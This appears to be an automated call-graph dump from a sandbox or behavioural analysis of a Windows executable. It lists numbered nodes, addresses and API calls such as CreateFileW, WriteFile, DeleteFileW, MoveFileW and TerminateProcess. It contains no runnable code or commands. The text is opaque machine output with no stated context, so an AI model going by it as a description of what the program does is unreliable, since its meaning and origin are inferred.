98620->98630 98623->98281 98624->98286 98626 b442e8 98625->98626 98627 b3d766 98625->98627 98626->98627 98628 b442ed FindCloseChangeNotification 98626->98628 98627->98287 98629 b43f0b FindCloseChangeNotification 98627->98629 98628->98627 98629->98287 98630->98258 98631->98258 98633 b419fb 98632->98633 98635 b419ee 98632->98635 98634 b50fe6 Mailbox 59 API calls 98633->98634 98634->98635 98635->98589 98643 b44124 98636->98643 98637 b441ab SetFilePointerEx 98644 b442ae SetFilePointerEx 98637->98644 98640 b806cc 98645 b442ae SetFilePointerEx 98640->98645 98641 b4417f 98641->98597 98642 b806e6 98643->98637 98643->98640 98643->98641 98644->98641 98645->98642 98647 b44293 98646->98647 98651 b4422e 98646->98651 98652 b442ae SetFilePointerEx 98647->98652 98648 b43eb2 98648->98279 98650 b44266 ReadFile 98650->98648 98650->98651 98651->98648 98651->98650 98652->98651 98654 b806fc 98653->98654 98655 b44312 CreateFileW 98653->98655 98656 b44334 98654->98656 98657 b80702 CreateFileW 98654->98657 98655->98656 98656->98616 98657->98656 98658 b80728 98657->98658 98659 b4410a 2 API calls 98658->98659 98660 b80733 98659->98660 98660->98656 98661->98618 98663 b438b5 98662->98663 98664 b438a8 98662->98664 98663->98620 98666 b9394d 98663->98666 98665 b4410a 2 API calls 98664->98665 98665->98663 98669 b9384c 98666->98669 98668 b93959 WriteFile 98668->98620 98670 b9385e 98669->98670 98671 b93853 98669->98671 98670->98668 98676 b442ae SetFilePointerEx 98671->98676 98673 b938b8 SetFilePointerEx 98677 b442ae SetFilePointerEx 98673->98677 98675 b938d7 98675->98668 98676->98673 98677->98675 98679 b41207 59 API calls 98678->98679 98680 b5012f 98679->98680 98681 b41207 59 API calls 98680->98681 98682 b50137 98681->98682 98683 b41207 59 API calls 98682->98683 98684 b5013f 98683->98684 98685 b41207 59 API calls 98684->98685 98686 b50147 98685->98686 98687 b8627d 98686->98687 98688 b5017b 98686->98688 98689 b41c9c 59 API calls 98687->98689 98690 b41462 59 API calls 98688->98690 98691 b86286 98689->98691 98692 b50189 98690->98692 98693 b419e1 59 API calls 98691->98693 98694 b41981 59 API calls 98692->98694 98697 b501be 98693->98697 98695 b50193 98694->98695 98695->98697 98698 b41462 59 API calls 98695->98698 98696 b501fe 98744 b41462 98696->98744 98697->98696 98700 b501dd 98697->98700 98710 b862a6 98697->98710 98701 b501b4 98698->98701 98757 b41609 98700->98757 98703 b41981 59 API calls 98701->98703 98702 b86376 98706 b41821 59 API calls 98702->98706 98703->98697 98705 b5020f 98708 b50221 98705->98708 98711 b41c9c 59 API calls 98705->98711 98719 b86333 98706->98719 98709 b50231 98708->98709 98712 b41c9c 59 API calls 98708->98712 98714 b50238 98709->98714 98716 b41c9c 59 API calls 98709->98716 98710->98702 98713 b8635f 98710->98713 98726 b862dd 98710->98726 98711->98708 98712->98709 98713->98702 98721 b8634a 98713->98721 98717 b5023f Mailbox 98714->98717 98718 b41c9c 59 API calls 98714->98718 98715 b41462 59 API calls 98715->98696 98716->98714 98717->98313 98718->98717 98719->98696 98720 b41609 59 API calls 98719->98720 98760 b4153b 59 API calls 2 library calls 98719->98760 98720->98719 98724 b41821 59 API calls 98721->98724 98722 b8633b 98723 b41821 59 API calls 98722->98723 98723->98719 98724->98719 98726->98722 98727 b86326 98726->98727 98728 b41821 59 API calls 98727->98728 98728->98719 98730 b4133d 59 API calls 98729->98730 98731 b93f52 GetFileAttributesW 98730->98731 98732 b93f66 GetLastError 98731->98732 98734 b93f7f Mailbox 98731->98734 98733 b93f73 CreateDirectoryW 98732->98733 98735 b93f81 98732->98735 98733->98734 98733->98735 98734->98335 98735->98734 98736 b41981 59 API calls 98735->98736 98737 b93fc3 98736->98737 98738 b93f1d 59 API calls 98737->98738 98739 b93fcc 98738->98739 98739->98734 98740 b93fd0 CreateDirectoryW 98739->98740 98740->98734 98741->98299 98742->98332 98743->98332 98745 b41471 98744->98745 98746 b414ce 98744->98746 98745->98746 98748 b4147c 98745->98748 98747 b41981 59 API calls 98746->98747 98749 b4149f _memmove 98747->98749 98750 b41497 98748->98750 98751 b7f1de 98748->98751 98749->98705 98761 b41b7c 59 API calls Mailbox 98750->98761 98752 b41c7e 59 API calls 98751->98752 98754 b7f1e8 98752->98754 98755 b50fe6 Mailbox 59 API calls 98754->98755 98756 b7f208 98755->98756 98758 b41aa4 59 API calls 98757->98758 98759 b41614 98758->98759 98759->98696 98759->98715 98760->98719 98761->98749 98763 b34d37 84 API calls 98762->98763 98764 bad203 98763->98764 98769 bad24a Mailbox 98764->98769 98800 bade8e 98764->98800 98766 bad617 98851 badfb1 92 API calls Mailbox 98766->98851 98769->98338 98770 bad29b Mailbox 98770->98769 98773 b34d37 84 API calls 98770->98773 98787 bad4a2 98770->98787 98833 b9fc0d 59 API calls 2 library calls 98770->98833 98834 bad6c8 61 API calls 2 library calls 98770->98834 98771 bad626 98772 bad4b0 98771->98772 98774 bad632 98771->98774 98813 bad057 98772->98813 98773->98770 98774->98769 98779 bad4e9 98828 b50e38 98779->98828 98782 bad51c 98836 b347be 98782->98836 98783 bad503 98835 b9a48d 89 API calls 4 library calls 98783->98835 98786 bad50e GetCurrentProcess TerminateProcess 98786->98782 98787->98766 98787->98772 98792 bad68d 98792->98769 98796 bad6a1 FreeLibrary 98792->98796 98793 bad554 98848 badd32 107 API calls _free 98793->98848 98796->98769 98799 bad565 98799->98792 98849 b34230 59 API calls Mailbox 98799->98849 98850 b3523c 59 API calls 98799->98850 98852 badd32 107 API calls _free 98799->98852 98801 b41aa4 59 API calls 98800->98801 98802 badea9 CharLowerBuffW 98801->98802 98853 b8f903 98802->98853 98806 b41207 59 API calls 98807 badee2 98806->98807 98808 b41462 59 API calls 98807->98808 98809 badef9 98808->98809 98810 b41981 59 API calls 98809->98810 98811 badf05 Mailbox 98810->98811 98812 badf41 Mailbox 98811->98812 98860 bad6c8 61 API calls 2 library calls 98811->98860 98812->98770 98814 bad0c7 98813->98814 98815 bad072 98813->98815 98819 bae139 98814->98819 98816 b50fe6 Mailbox 59 API calls 98815->98816 98818 bad094 98816->98818 98817 b50fe6 Mailbox 59 API calls 98817->98818 98818->98814 98818->98817 98820 bae362 Mailbox 98819->98820 98827 bae15c _strcat _wcscpy __wsetenvp 98819->98827 98820->98779 98821 b35087 59 API calls 98821->98827 98822 b350d5 59 API calls 98822->98827 98823 b3502b 59 API calls 98823->98827 98824 b34d37 84 API calls 98824->98827 98825 b5593c 58 API calls _W_store_winword 98825->98827 98827->98820 98827->98821 98827->98822 98827->98823 98827->98824 98827->98825 98868 b95e42 61 API calls 2 library calls 98827->98868 98830 b50e4d 98828->98830 98829 b50ee5 SetErrorMode 98831 b50eb3 98829->98831 98830->98829 98830->98831 98832 b50ed3 FindCloseChangeNotification 98830->98832 98831->98782 98831->98783 98832->98831 98833->98770 98834->98770 98835->98786 98837 b347c6 98836->98837 98838 b50fe6 Mailbox 59 API calls 98837->98838 98839 b347d4 98838->98839 98840 b347e0 98839->98840 98869 b346ec 59 API calls Mailbox 98839->98869 98842 b34540 98840->98842 98870 b34650 98842->98870 98844 b3454f 98845 b50fe6 Mailbox 59 API calls 98844->98845 98846 b345eb 98844->98846 98845->98846 98846->98799 98847 b34230 59 API calls Mailbox 98846->98847 98847->98793 98848->98799 98849->98799 98850->98799 98851->98771 98852->98799 98854 b8f92e __wsetenvp 98853->98854 98855 b8f96d 98854->98855 98858 b8f963 98854->98858 98859 b8fa14 98854->98859 98855->98806 98855->98811 98857 b414db 61 API calls 98857->98859 98858->98855 98861 b414db 98858->98861 98859->98855 98859->98857 98860->98812 98862 b414e9 CompareStringW 98861->98862 98867 b7f210 98861->98867 98865 b4150c 98862->98865 98864 b7f25f 98865->98858 98866 b54eb8 60 API calls 98866->98867 98867->98864 98867->98866 98868->98827 98869->98840 98871 b34659 Mailbox 98870->98871 98872 b6d6ec 98871->98872 98877 b34663 98871->98877 98873 b50fe6 Mailbox 59 API calls 98872->98873 98874 b6d6f8 98873->98874 98875 b3466a 98875->98844 98877->98875 98878 b35190 59 API calls Mailbox 98877->98878 98878->98877 98889 b94ce2 98879->98889 98881 b9418e Mailbox 98882 b94195 Process32NextW 98881->98882 98883 b94244 FindCloseChangeNotification 98881->98883 98884 b41207 59 API calls 98881->98884 98885 b41a36 59 API calls 98881->98885 98886 b50119 59 API calls 98881->98886 98887 b417e0 59 API calls 98881->98887 98895 b4151f 98881->98895 98882->98881 98882->98883 98883->98346 98884->98881 98885->98881 98886->98881 98887->98881 98890 b94d09 98889->98890 98894 b94cf0 98889->98894 98899 b537c3 59 API calls __wcstoi64 98890->98899 98893 b94d0f 98893->98881 98894->98890 98894->98893 98898 b5385c GetStringTypeW _iswctype 98894->98898 98896 b414db 61 API calls 98895->98896 98897 b41537 98896->98897 98897->98881 98898->98894 98899->98893 98901 b50fe6 Mailbox 59 API calls 98900->98901 98902 b440e0 98901->98902 98903 b41c7e 59 API calls 98902->98903 98904 b440ed 98903->98904 98904->98355 98906 b44085 98905->98906 98907 b4404e 98905->98907 98917 b43f20 59 API calls Mailbox 98906->98917 98909 b50fe6 Mailbox 59 API calls 98907->98909 98911 b44055 WideCharToMultiByte 98909->98911 98910 b44077 98910->98360 98916 b43f79 59 API calls 2 library calls 98911->98916 98914 b50fe6 Mailbox 59 API calls 98913->98914 98915 b44351 98914->98915 98915->98368 98915->98369 98916->98910 98917->98910 98919 baa918 98918->98919 98920 baa970 98918->98920 98921 b50fe6 Mailbox 59 API calls 98919->98921 98920->98378 98924 baa93a 98921->98924 98922 b50fe6 Mailbox 59 API calls 98922->98924 98924->98920 98924->98922 98992 b8715b 59 API calls Mailbox 98924->98992 98926 b978ac 98925->98926 98927 b978e3 98925->98927 98926->98927 98928 b50fe6 Mailbox 59 API calls 98926->98928 98929 b86ebc 98927->98929 98928->98927 98930 b86f06 98929->98930 98934 b86f1c Mailbox 98929->98934 98931 b41a36 59 API calls 98930->98931 98931->98934 98932 b86f5a 98993 b3a820 98932->98993 98933 b86f47 98935 bac355 299 API calls 98933->98935 98934->98932 98934->98933 98938 b86f53 98935->98938 99017 b86cf1 59 API calls Mailbox 98938->99017 98939 b87002 98939->98380 98940 b86fdc 98940->98938 99016 b9a48d 89 API calls 4 library calls 98940->99016 98941 b86f91 98941->98938 98941->98940 98943 b86fc1 98941->98943 99010 b8706d 98943->99010 98945->98380 98946->98389 98947->98394 99033 b43740 98948->99033 98951 b730b6 99129 b9a48d 89 API calls 4 library calls 98951->99129 98952 b3b07f 98952->98951 98954 b730d4 98952->98954 98970 b3bb86 98952->98970 98987 b3b132 Mailbox _memmove 98952->98987 99130 b9a48d 89 API calls 4 library calls 98954->99130 98956 b7355e 98968 b3b4dd 98956->98968 99145 b9a48d 89 API calls 4 library calls 98956->99145 98958 b7318a 98958->98968 99132 b9a48d 89 API calls 4 library calls 98958->99132 98962 b73106 98962->98958 99131 b3a9de 299 API calls 98962->99131 98965 b33b31 59 API calls 98965->98987 98966 b8730a 59 API calls 98966->98987 98968->98380 99128 b9a48d 89 API calls 4 library calls 98970->99128 98971 b353b0 299 API calls 98971->98987 98972 b73418 98973 b353b0 299 API calls 98972->98973 98975 b73448 98973->98975 98975->98968 99139 b339be 98975->99139 98978 b731c3 99133 b9a48d 89 API calls 4 library calls 98978->99133 98979 b33c30 68 API calls 98979->98987 98982 b7346f 99143 b9a48d 89 API calls 4 library calls 98982->99143 98984 b3523c 59 API calls 98984->98987 98986 b41c9c 59 API calls 98986->98987 98987->98956 98987->98962 98987->98965 98987->98966 98987->98968 98987->98970 98987->98971 98987->98972 98987->98978 98987->98979 98987->98982 98987->98984 98987->98986 98988 b50fe6 59 API calls Mailbox 98987->98988 99038 b33add 98987->99038 99045 b3bc70 98987->99045 99126 b33a40 59 API calls Mailbox 98987->99126 99127 b35190 59 API calls Mailbox 98987->99127 99134 b86c62 59 API calls 2 library calls 98987->99134 99135 baa9c3 85 API calls Mailbox 98987->99135 99136 b86c1e 59 API calls Mailbox 98987->99136 99137 b95ef2 68 API calls 98987->99137 99138 b33ea3 68 API calls Mailbox 98987->99138 99144 b9a12a 59 API calls 98987->99144 98988->98987 98990->98406 98991->98410 98992->98924 98994 b72d51 98993->98994 98997 b3a84c 98993->98997 99019 b9a48d 89 API calls 4 library calls 98994->99019 98996 b72d62 98996->98941 98998 b72d6a 98997->98998 99005 b3a888 _memmove 98997->99005 99020 b9a48d 89 API calls 4 library calls 98998->99020 99000 b50fe6 59 API calls Mailbox 99000->99005 99002 b72dae 99021 b3a9de 299 API calls 99002->99021 99003 b353b0 299 API calls 99003->99005 99005->99000 99005->99002 99005->99003 99006 b72dc8 99005->99006 99007 b3a975 99005->99007 99008 b3a962 99005->99008 99006->99007 99022 b9a48d 89 API calls 4 library calls 99006->99022 99007->98941 99008->99007 99018 baa9c3 85 API calls Mailbox 99008->99018 99011 b87085 99010->99011 99014 b9413a 3 API calls 99011->99014 99015 baf1b2 91 API calls 99011->99015 99023 ba495b 99011->99023 99012 b870d9 99012->98938 99014->99012 99015->99012 99016->98938 99017->98939 99018->99007 99019->98996 99020->99007 99021->99006 99022->99007 99024 b50fe6 Mailbox 59 API calls 99023->99024 99025 ba496c 99024->99025 99026 b4433f 59 API calls 99025->99026 99027 ba4976 99026->99027 99028 b34d37 84 API calls 99027->99028 99029 ba498d GetEnvironmentVariableW 99028->99029 99032 b97a51 59 API calls Mailbox 99029->99032 99031 ba49aa 99031->99012 99032->99031 99034 b4374f 99033->99034 99037 b4376a 99033->99037 99035 b41aa4 59 API calls 99034->99035 99036 b43757 CharUpperBuffW 99035->99036 99036->99037 99037->98952 99039 b6d3cd 99038->99039 99040 b33aee 99038->99040 99041 b50fe6 Mailbox 59 API calls 99040->99041 99043 b33af5 99041->99043 99042 b33b16 99042->98987 99043->99042 99146 b33ba5 59 API calls Mailbox 99043->99146 99046 b7359f 99045->99046 99057 b3bc95 99045->99057 99237 b9a48d 89 API calls 4 library calls 99046->99237 99048 b3bf3b 99048->98987 99052 b3c2b6 99052->99048 99053 b3c2c3 99052->99053 99235 b3c483 299 API calls Mailbox 99053->99235 99056 b3c2ca LockWindowUpdate DestroyWindow GetMessageW 99056->99048 99058 b3c2fc 99056->99058 99118 b3bca5 Mailbox 99057->99118 99238 b35376 60 API calls 99057->99238 99239 b8700c 299 API calls 99057->99239 99060 b74509 TranslateMessage DispatchMessageW GetMessageW 99058->99060 99059 b736b3 Sleep 99059->99118 99060->99060 99061 b74539 99060->99061 99061->99048 99062 b3bf54 timeGetTime 99062->99118 99064 b7405d WaitForSingleObject 99065 b7407d GetExitCodeProcess CloseHandle 99064->99065 99064->99118 99069 b3c36b 99065->99069 99066 b41c9c 59 API calls 99066->99118 99067 b41207 59 API calls 99098 b3c1fa Mailbox 99067->99098 99068 b3c210 Sleep 99068->99098 99069->98987 99070 b50fe6 59 API calls Mailbox 99070->99118 99072 b743a9 Sleep 99072->99098 99073 b50859 timeGetTime 99073->99098 99075 b3c324 timeGetTime 99236 b35376 60 API calls 99075->99236 99077 b94148 66 API calls 99077->99098 99078 b74440 GetExitCodeProcess 99080 b74456 WaitForSingleObject 99078->99080 99081 b7446c CloseHandle 99078->99081 99079 b34d37 84 API calls 99079->99118 99080->99081 99080->99118 99081->99098 99082 b36cd8 277 API calls 99082->99118 99083 bb6562 110 API calls 99083->99098 99085 b36d79 109 API calls 99085->99118 99087 b738aa Sleep 99087->99118 99088 b744c8 Sleep 99088->99118 99091 b41a36 59 API calls 99091->99098 99092 b35376 60 API calls 99092->99118 99097 b3c26d 99101 b41a36 59 API calls 99097->99101 99098->99067 99098->99068 99098->99069 99098->99073 99098->99077 99098->99078 99098->99083 99098->99087 99098->99088 99098->99091 99098->99118 99246 b92baf 60 API calls 99098->99246 99247 b35376 60 API calls 99098->99247 99248 b33ea3 68 API calls Mailbox 99098->99248 99249 b36cd8 299 API calls 99098->99249 99250 b870e2 59 API calls 99098->99250 99251 b957ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99098->99251 99099 b3b020 277 API calls 99099->99118 99105 b3bf25 Mailbox 99101->99105 99102 b41a36 59 API calls 99102->99118 99103 bac355 277 API calls 99103->99118 99104 b9a48d 89 API calls 99104->99118 99105->99048 99234 b3c460 10 API calls Mailbox 99105->99234 99107 b339be 68 API calls 99107->99118 99108 b3a820 277 API calls 99108->99118 99109 b353b0 277 API calls 99109->99118 99111 b73e13 VariantClear 99111->99118 99112 b86cf1 59 API calls Mailbox 99112->99118 99113 b73ea9 VariantClear 99113->99118 99114 b73c57 VariantClear 99114->99118 99115 b341c4 59 API calls Mailbox 99115->99118 99116 b87aad 59 API calls 99116->99118 99117 b33ea3 68 API calls 99117->99118 99118->99059 99118->99062 99118->99064 99118->99066 99118->99068 99118->99069 99118->99070 99118->99072 99118->99075 99118->99079 99118->99082 99118->99085 99118->99092 99118->99097 99118->99098 99118->99099 99118->99102 99118->99103 99118->99104 99118->99105 99118->99107 99118->99108 99118->99109 99118->99111 99118->99112 99118->99113 99118->99114 99118->99115 99118->99116 99118->99117 99119 b35190 59 API calls Mailbox 99118->99119 99120 b9412a 3 API calls 99118->99120 99121 bae60c 130 API calls 99118->99121 99124 b442cf FindCloseChangeNotification 99118->99124 99147 b352b0 99118->99147 99156 b39a00 99118->99156 99163 b39c80 99118->99163 99194 b9bcd6 99118->99194 99224 b9e4a0 99118->99224 99227 b9c270 99118->99227 99240 bb6655 59 API calls 99118->99240 99241 b9a058 59 API calls Mailbox 99118->99241 99242 b8e0aa 59 API calls 99118->99242 99243 b86c62 59 API calls 2 library calls 99118->99243 99244 b338ff 59 API calls 99118->99244 99245 b33a40 59 API calls Mailbox 99118->99245 99119->99118 99120->99118 99121->99118 99124->99118 99126->98987 99127->98987 99128->98951 99129->98968 99130->98968 99131->98958 99132->98968 99133->98968 99134->98987 99135->98987 99136->98987 99137->98987 99138->98987 99140 b339c9 99139->99140 99142 b339f0 99140->99142 99530 b33ea3 68 API calls Mailbox 99140->99530 99142->98982 99143->98968 99144->98987 99145->98968 99146->99042 99148 b352c6 99147->99148 99150 b35313 99147->99150 99149 b352d3 PeekMessageW 99148->99149 99148->99150 99149->99150 99151 b352ec 99149->99151 99150->99151 99153 b6df68 TranslateAcceleratorW 99150->99153 99154 b35352 TranslateMessage DispatchMessageW 99150->99154 99155 b3533e PeekMessageW 99150->99155 99252 b3359e 99150->99252 99151->99118 99153->99150 99153->99155 99154->99155 99155->99150 99155->99151 99157 b39a31 99156->99157 99158 b39a1d 99156->99158 99291 b9a48d 89 API calls 4 library calls 99157->99291 99257 b394e0 99158->99257 99160 b39a28 99160->99118 99162 b72478 99162->99162 99164 b39cb5 99163->99164 99165 b7247d 99164->99165 99167 b39d1f 99164->99167 99177 b39d79 99164->99177 99166 b353b0 299 API calls 99165->99166 99168 b72492 99166->99168 99171 b41207 59 API calls 99167->99171 99167->99177 99190 b39f50 Mailbox 99168->99190 99301 b9a48d 89 API calls 4 library calls 99168->99301 99169 b41207 59 API calls 99169->99177 99173 b724d8 99171->99173 99172 b52f70 __cinit 67 API calls 99172->99177 99175 b52f70 __cinit 67 API calls 99173->99175 99174 b724fa 99174->99118 99175->99177 99176 b339be 68 API calls 99176->99190 99177->99169 99177->99172 99177->99174 99181 b39f3a 99177->99181 99177->99190 99178 b353b0 299 API calls 99178->99190 99180 b3a775 99306 b9a48d 89 API calls 4 library calls 99180->99306 99181->99190 99302 b9a48d 89 API calls 4 library calls 99181->99302 99185 b727f9 99185->99118 99186 b34230 59 API calls 99186->99190 99190->99176 99190->99178 99190->99180 99190->99186 99192 b9a48d 89 API calls 99190->99192 99193 b3a058 99190->99193 99300 b41bcc 59 API calls 2 library calls 99190->99300 99303 b87aad 59 API calls 99190->99303 99304 baccac 299 API calls 99190->99304 99305 babc26 299 API calls Mailbox 99190->99305 99307 b35190 59 API calls Mailbox 99190->99307 99308 ba9ab0 299 API calls Mailbox 99190->99308 99192->99190 99193->99118 99195 b9bdbb Mailbox 99194->99195 99196 b9bcf5 99194->99196 99198 b34d37 84 API calls 99195->99198 99206 b9bdc3 Mailbox 99195->99206 99197 b3502b 59 API calls 99196->99197 99199 b9bd00 99197->99199 99200 b9bdf3 99198->99200 99202 b3502b 59 API calls 99199->99202 99201 b34d37 84 API calls 99200->99201 99203 b9be05 99201->99203 99204 b9bd14 99202->99204 99309 b93ce2 99203->99309 99204->99195 99207 b41207 59 API calls 99204->99207 99206->99118 99208 b9bd25 99207->99208 99209 b41207 59 API calls 99208->99209 99210 b9bd2e 99209->99210 99211 b34d37 84 API calls 99210->99211 99212 b9bd3b 99211->99212 99213 b50119 59 API calls 99212->99213 99214 b9bd4e 99213->99214 99215 b417e0 59 API calls 99214->99215 99216 b9bd5f 99215->99216 99217 b9412a 3 API calls 99216->99217 99223 b9bd88 Mailbox 99216->99223 99219 b9bd6e 99217->99219 99218 b3502b 59 API calls 99218->99195 99220 b41a36 59 API calls 99219->99220 99219->99223 99221 b9bd7f 99220->99221 99222 b93f1d 63 API calls 99221->99222 99222->99223 99223->99218 99436 b9f87d 99224->99436 99226 b9e4b0 99226->99118 99228 b34d37 84 API calls 99227->99228 99229 b9c286 99228->99229 99506 b94005 99229->99506 99231 b9c28e 99232 b9c292 GetLastError 99231->99232 99233 b9c2a7 99231->99233 99232->99233 99233->99118 99234->99052 99235->99056 99236->99118 99237->99057 99238->99057 99239->99057 99240->99118 99241->99118 99242->99118 99243->99118 99244->99118 99245->99118 99246->99098 99247->99098 99248->99098 99249->99098 99250->99098 99251->99098 99253 b335e2 99252->99253 99255 b335b0 99252->99255 99253->99150 99254 b335d5 IsDialogMessageW 99254->99253 99254->99255 99255->99253 99255->99254 99256 b6d273 GetClassLongW 99255->99256 99256->99254 99256->99255 99258 b353b0 299 API calls 99257->99258 99259 b3951f 99258->99259 99260 b72001 99259->99260 99274 b39527 _memmove 99259->99274 99293 b35190 59 API calls Mailbox 99260->99293 99262 b722c0 99299 b9a48d 89 API calls 4 library calls 99262->99299 99264 b722de 99264->99264 99265 b39583 99265->99160 99266 b39944 99271 b50fe6 Mailbox 59 API calls 99266->99271 99267 b3986a 99269 b722b1 99267->99269 99270 b3987f 99267->99270 99268 b50fe6 59 API calls Mailbox 99268->99274 99298 baa983 59 API calls 99269->99298 99272 b50fe6 Mailbox 59 API calls 99270->99272 99275 b396e3 _memmove 99271->99275 99285 b3977d 99272->99285 99274->99262 99274->99265 99274->99266 99274->99268 99276 b396cf 99274->99276 99278 b39741 99274->99278 99277 b50fe6 Mailbox 59 API calls 99275->99277 99275->99278 99282 b3970e 99275->99282 99276->99266 99279 b396dc 99276->99279 99277->99282 99278->99267 99280 b722a0 99278->99280 99278->99285 99287 b72278 99278->99287 99289 b72253 99278->99289 99294 b38180 299 API calls 99278->99294 99281 b50fe6 Mailbox 59 API calls 99279->99281 99297 b9a48d 89 API calls 4 library calls 99280->99297 99281->99275 99282->99278 99292 b3cca0 299 API calls 99282->99292 99285->99160 99296 b9a48d 89 API calls 4 library calls 99287->99296 99295 b9a48d 89 API calls 4 library calls 99289->99295 99291->99162 99292->99278 99293->99266 99294->99278 99295->99285 99296->99285 99297->99285 99298->99262 99299->99264 99300->99190 99301->99190 99302->99190 99303->99190 99304->99190 99305->99190 99306->99185 99307->99190 99308->99190 99310 b41207 59 API calls 99309->99310 99311 b93cff 99310->99311 99312 b41207 59 API calls 99311->99312 99313 b93d07 99312->99313 99314 b41207 59 API calls 99313->99314 99315 b93d0f 99314->99315 99316 b41207 59 API calls 99315->99316 99317 b93d17 99316->99317 99355 b50284 99317->99355 99320 b50284 60 API calls 99321 b93d2b 99320->99321 99365 b94f82 99321->99365 99323 b93d36 99376 b94fec GetFileAttributesW 99323->99376 99326 b93d53 99328 b94fec GetFileAttributesW 99326->99328 99327 b41900 59 API calls 99327->99326 99329 b93d5b 99328->99329 99330 b93d68 99329->99330 99332 b41900 59 API calls 99329->99332 99331 b41207 59 API calls 99330->99331 99333 b93d70 99331->99333 99332->99330 99334 b41207 59 API calls 99333->99334 99335 b93d78 99334->99335 99336 b50119 59 API calls 99335->99336 99337 b93d89 FindFirstFileW 99336->99337 99338 b93eb4 FindClose 99337->99338 99349 b93dac Mailbox 99337->99349 99343 b93ebe Mailbox 99338->99343 99339 b93e88 FindNextFileW 99339->99349 99340 b41a36 59 API calls 99340->99349 99342 b41c9c 59 API calls 99342->99349 99343->99206 99344 b417e0 59 API calls 99344->99349 99345 b41900 59 API calls 99345->99349 99346 b9412a 3 API calls 99346->99349 99347 b93eab FindClose 99347->99343 99348 b93e2a 99351 b4151f 61 API calls 99348->99351 99352 b93e4e MoveFileW 99348->99352 99353 b93e3e DeleteFileW 99348->99353 99349->99338 99349->99339 99349->99340 99349->99342 99349->99344 99349->99345 99349->99346 99349->99347 99349->99348 99350 b93ef7 CopyFileExW 99349->99350 99354 b93e6b DeleteFileW 99349->99354 99378 b94561 99349->99378 99350->99349 99351->99348 99352->99349 99353->99349 99354->99349 99432 b61b70 99355->99432 99358 b502b0 99360 b41821 59 API calls 99358->99360 99359 b502cd 99361 b419e1 59 API calls 99359->99361 99362 b502bc 99360->99362 99361->99362 99363 b4133d 59 API calls 99362->99363 99364 b502c8 99363->99364 99364->99320 99366 b41207 59 API calls 99365->99366 99367 b94f97 99366->99367 99368 b41207 59 API calls 99367->99368 99369 b94f9f 99368->99369 99370 b50119 59 API calls 99369->99370 99371 b94fae 99370->99371 99372 b50119 59 API calls 99371->99372 99373 b94fbe 99372->99373 99374 b4151f 61 API calls 99373->99374 99375 b94fce Mailbox 99374->99375 99375->99323 99377 b93d41 99376->99377 99377->99326 99377->99327 99379 b9457d 99378->99379 99380 b94590 99379->99380 99381 b94582 99379->99381 99383 b41207 59 API calls 99380->99383 99382 b41c9c 59 API calls 99381->99382 99431 b9458b Mailbox 99382->99431 99384 b94598 99383->99384 99385 b41207 59 API calls 99384->99385 99386 b945a0 99385->99386 99387 b41207 59 API calls 99386->99387 99388 b945ab 99387->99388 99389 b41207 59 API calls 99388->99389 99390 b945b3 99389->99390 99391 b41207 59 API calls 99390->99391 99392 b945bb 99391->99392 99393 b41207 59 API calls 99392->99393 99394 b945c3 99393->99394 99395 b41207 59 API calls 99394->99395 99396 b945cb 99395->99396 99397 b41207 59 API calls 99396->99397 99398 b945d3 99397->99398 99399 b50119 59 API calls 99398->99399 99400 b945ea 99399->99400 99401 b50119 59 API calls 99400->99401 99402 b94603 99401->99402 99403 b41609 59 API calls 99402->99403 99404 b9460f 99403->99404 99405 b94622 99404->99405 99407 b41981 59 API calls 99404->99407 99406 b41609 59 API calls 99405->99406 99408 b9462b 99406->99408 99407->99405 99409 b9463b 99408->99409 99410 b41981 59 API calls 99408->99410 99411 b41c9c 59 API calls 99409->99411 99410->99409 99412 b94647 99411->99412 99413 b417e0 59 API calls 99412->99413 99414 b94653 99413->99414 99434 b94713 59 API calls 99414->99434 99416 b94662 99435 b94713 59 API calls 99416->99435 99418 b94675 99419 b41609 59 API calls 99418->99419 99420 b9467f 99419->99420 99421 b94684 99420->99421 99422 b94696 99420->99422 99423 b41900 59 API calls 99421->99423 99424 b41609 59 API calls 99422->99424 99425 b94691 99423->99425 99426 b9469f 99424->99426 99429 b417e0 59 API calls 99425->99429 99427 b946bd 99426->99427 99428 b41900 59 API calls 99426->99428 99430 b417e0 59 API calls 99427->99430 99428->99425 99429->99427 99430->99431 99431->99349 99433 b50291 GetFullPathNameW 99432->99433 99433->99358 99433->99359 99434->99416 99435->99418 99437 b9f898 99436->99437 99438 b9f8f2 99436->99438 99439 b50fe6 Mailbox 59 API calls 99437->99439 99498 b9fbb7 59 API calls 99438->99498 99441 b9f89f 99439->99441 99442 b9f8ab 99441->99442 99496 b43df7 60 API calls Mailbox 99441->99496 99444 b34d37 84 API calls 99442->99444 99449 b9f8bd 99444->99449 99445 b9f9cb 99492 b98cd0 99445->99492 99446 b9f8ff 99446->99445 99447 b9f8d9 99446->99447 99453 b9f93f 99446->99453 99447->99226 99451 b43e47 67 API calls 99449->99451 99450 b9f9d2 99456 b9394d 3 API calls 99450->99456 99452 b9f8c9 99451->99452 99452->99446 99454 b9f8cd 99452->99454 99455 b34d37 84 API calls 99453->99455 99454->99447 99497 b43f0b FindCloseChangeNotification 99454->99497 99461 b9f946 99455->99461 99472 b9f9ae Mailbox 99456->99472 99458 b9f9c1 99473 b9399c 99458->99473 99459 b9f97a 99462 b4162d 59 API calls 99459->99462 99461->99458 99461->99459 99464 b9f98a 99462->99464 99463 b442cf FindCloseChangeNotification 99465 b9fa20 99463->99465 99466 b41c9c 59 API calls 99464->99466 99465->99447 99499 b43f0b FindCloseChangeNotification 99465->99499 99467 b9f994 99466->99467 99469 b41900 59 API calls 99467->99469 99470 b9f9a2 99469->99470 99471 b9399c 66 API calls 99470->99471 99471->99472 99472->99447 99472->99463 99474 b939af 99473->99474 99475 b93a15 99473->99475 99474->99475 99477 b939b4 99474->99477 99476 b9394d 3 API calls 99475->99476 99478 b939fd Mailbox 99476->99478 99479 b93a09 99477->99479 99480 b939be 99477->99480 99478->99472 99504 b93a35 62 API calls Mailbox 99479->99504 99482 b939de 99480->99482 99483 b939c8 99480->99483 99484 b440cd 59 API calls 99482->99484 99485 b440cd 59 API calls 99483->99485 99486 b939e6 99484->99486 99487 b939d0 99485->99487 99503 b938e0 61 API calls Mailbox 99486->99503 99489 b4402a 61 API calls 99487->99489 99490 b939dc 99489->99490 99500 b9397e 99490->99500 99493 b98cd9 99492->99493 99494 b98cde 99492->99494 99505 b97d6e 61 API calls 2 library calls 99493->99505 99494->99450 99496->99442 99497->99447 99498->99446 99499->99447 99501 b9394d 3 API calls 99500->99501 99502 b93990 99501->99502 99502->99478 99503->99490 